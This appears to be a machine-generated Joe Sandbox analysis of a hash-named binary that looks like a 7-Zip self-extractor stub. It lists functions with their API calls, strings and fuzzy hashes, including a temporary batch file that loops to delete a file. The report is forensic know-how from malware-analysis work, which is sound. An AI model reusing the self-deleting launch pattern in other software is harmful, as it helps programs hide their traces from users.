Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040962A
GetLastError.KERNEL32 ref: 0040963B
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
lstrlenW.KERNEL32(?), ref: 0040968B
lstrlenW.KERNEL32(?), ref: 00409692
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
LocalFree.KERNEL32(?), ref: 004096E1

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
Opcode Fuzzy Hash: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4

Function 004031DC Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00403291
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 004032A3
FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 004032BD
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 004032C6
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032D1
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032DC

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69

Function 00408DBB Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00408DDA
SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
GetCurrentThreadId.KERNEL32 ref: 00408DF4
SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
EndDialog.USER32(?,00000000), ref: 00408E25

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69

Function 00402744 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29

Function 00405489 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040556D
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00405575
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040557D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00405585
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040558D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 00405595
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 0040559D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004055A5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004055AD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055B5
GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040560A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405612
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8

Strings

" -, xrefs: 004054D5
sfxwaitall, xrefs: 004054D0

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 2734624574-3991362806
Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69

Function 00403B54 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403B78
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,@xk,00000000,0041E9F4), ref: 00403C1B
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403C8C
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403C94
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403C9C
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403CA4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403CAC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403CB4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403CBC
_wtol.MSVCRT ref: 00403D12
CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403E4B
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403E53
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403E5B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403E63
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403E6B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403E73
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403E7B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403E81
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403E89

Strings

[@, xrefs: 00403B65, 00403D9F, 00403DC1, 00403E13, 00403E3F, 00403E06, 00403DF5, 00403DE4, 00403DD3, 00403B77, 00403C7C, 00403DA2, 00403DCA, 00403DDB, 00403DEC, 00403DFD, 00403E0F, 00403E21, 00403E44
.lnk, xrefs: 00403D92
@xk, xrefs: 00403BF8

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk$@xk$[@
API String ID: 408529070-235293289
Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58

Function 00404F0E Relevance: 40.5, APIs: 3, Strings: 20, Instructions: 227stringCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004050E7
_wtol.MSVCRT ref: 00405103
lstrcmpiW.KERNEL32(00000000,0041B810,?,?,?,?,?,?,?,?,?,?,?,?,?,004062C4), ref: 00404FEA

Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
Part of subcall function 0040247D: lstrcmpiW.KERNEL32(006B91C8,?), ref: 00402541
Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(006B91C8), ref: 00402551
Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9

Strings

ExtractDialogText, xrefs: 004050B8
ExtractCancelText, xrefs: 004050AC
Progress, xrefs: 00404FD2
ExtractDialogWidth, xrefs: 004050C9
k, xrefs: 00404F56, 00404F77
GUIFlags, xrefs: 00405049, 0040504E, 0040506A
ExtractPathText, xrefs: 00405124
Title, xrefs: 00404F1C
MiscFlags, xrefs: 0040507C, 00405081, 0040509D
GUIMode, xrefs: 00404FFF
PasswordText, xrefs: 0040516C
WarningTitle, xrefs: 00404FA2
ExtractTitle, xrefs: 00404FBA
ErrorTitle, xrefs: 00404F8A
CancelPrompt, xrefs: 0040513C
ExtractPathTitle, xrefs: 0040510C
ExtractPathWidth, xrefs: 004050F0
xk, xrefs: 00404F84, 00405166
OverwriteMode, xrefs: 0040502C
PasswordTitle, xrefs: 00405154

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle$k$xk
API String ID: 2725485552-4290005358
Opcode ID: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
Opcode Fuzzy Hash: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF

Function 00405793 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
??3@YAXPAX@Z.MSVCRT(?), ref: 004058CB
CloseHandle.KERNEL32(0041EA30), ref: 004058D4
SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
??3@YAXPAX@Z.MSVCRT(?), ref: 00405906
??3@YAXPAX@Z.MSVCRT(?), ref: 00405912
??3@YAXPAX@Z.MSVCRT(00407468,?), ref: 00405918
??3@YAXPAX@Z.MSVCRT(00407468,?,?,?,?,?,?,?,?,?,?,?,?,?,00407468,0041EA30), ref: 00405946

Strings

7ZSfx%03x.cmd, xrefs: 004057EC
del ", xrefs: 00405833, 00405838, 00405881
if exist ", xrefs: 0040585B
:Repeat, xrefs: 00405826
" goto Repeat, xrefs: 00405874
open, xrefs: 004058F7
", xrefs: 0040584D, 00405852, 00405896

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98

Function 00403423 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403436
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
GetWindowLongW.USER32(?,000000F0), ref: 00403456

Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E

??3@YAXPAX@Z.MSVCRT(?), ref: 00403483
GetParent.USER32(?), ref: 00403491
LoadLibraryA.KERNEL32(riched20), ref: 004034A5
GetMenu.USER32(?), ref: 004034B8
SetThreadLocale.KERNEL32(00000419), ref: 004034C5
CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
DestroyWindow.USER32(?), ref: 00403506
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
GetSysColor.USER32(0000000F), ref: 0040351F
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
??3@YAXPAX@Z.MSVCRT(?), ref: 0040355D
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403565

Strings

{\rtf, xrefs: 0040346C
RichEdit20W, xrefs: 004034EF
STATIC, xrefs: 00403440
riched20, xrefs: 004034A0

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A

Function 00408E76 Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
LoadIconW.USER32(00000000), ref: 00408EA2
GetSystemMetrics.USER32(00000032), ref: 00408EB6
GetSystemMetrics.USER32(00000031), ref: 00408EBB
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
LoadImageW.USER32(00000000), ref: 00408EC7
SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
GetDlgItem.USER32(?,000004B2), ref: 00408F0C
GetDlgItem.USER32(?,000004B2), ref: 00408F16
GetWindowLongW.USER32(?,000000F0), ref: 00408F22
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
GetDlgItem.USER32(?,000004B5), ref: 00408F3F
GetDlgItem.USER32(?,000004B5), ref: 00408F4D
GetWindowLongW.USER32(?,000000F0), ref: 00408F59
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
GetWindow.USER32(?,00000005), ref: 0040904E
GetWindow.USER32(?,00000005), ref: 0040906A
GetWindow.USER32(?,00000005), ref: 00409082
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
LoadIconW.USER32(00000000), ref: 004090E9
GetDlgItem.USER32(?,000004B1), ref: 00409108
SendMessageW.USER32(00000000), ref: 0040910B

Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281

Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 3694754696-0
Opcode ID: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
Opcode Fuzzy Hash: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E

Function 004021A8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 004021B4
GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
GetObjectW.GDI32(?,00000018,?), ref: 00402208
MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
CreateCompatibleDC.GDI32(?), ref: 0040222B
CreateCompatibleDC.GDI32(?), ref: 00402232
SelectObject.GDI32(00000000,?), ref: 00402240
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
SelectObject.GDI32(00000000,00000000), ref: 00402256
SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
SelectObject.GDI32(00000000,?), ref: 00402293
SelectObject.GDI32(00000000,?), ref: 00402299
DeleteDC.GDI32(00000000), ref: 004022A2
DeleteDC.GDI32(00000000), ref: 004022A5
ReleaseDC.USER32(00000000,?), ref: 004022AC
ReleaseDC.USER32(00000000,?), ref: 004022BB
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
